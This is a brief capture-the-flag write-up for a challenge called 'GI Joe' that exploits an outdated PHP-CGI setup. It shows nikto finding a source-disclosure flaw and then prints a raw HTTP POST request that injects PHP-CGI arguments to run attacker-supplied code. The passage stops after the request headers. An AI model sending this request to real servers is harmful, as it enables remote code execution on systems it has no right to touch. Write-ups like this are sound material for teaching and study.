Tags: hacktivityconctf2020
Rating:
## GI Joe write up
There is a /cgi-bin/ and the apache and php is old so I decide to look for vulns
I ran nikto and it shows is vulnerable to /?-s this shows the source code of index.php
In the source code we can read that the flag is at /flag.txt
Searching for the vulnerablility I found this post https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/php-cgi-exploitation-by-example/
In the post they explain how to leverage the -d to execute php code with a post request:
```
POST /?-dallow_url_include%3d1+-dauto_prepend_file%3dphp://input HTTP/1.1
Host: jh2i.com:50008
Content-Type: application/x-www-form-urlencoded
Content-Length: 66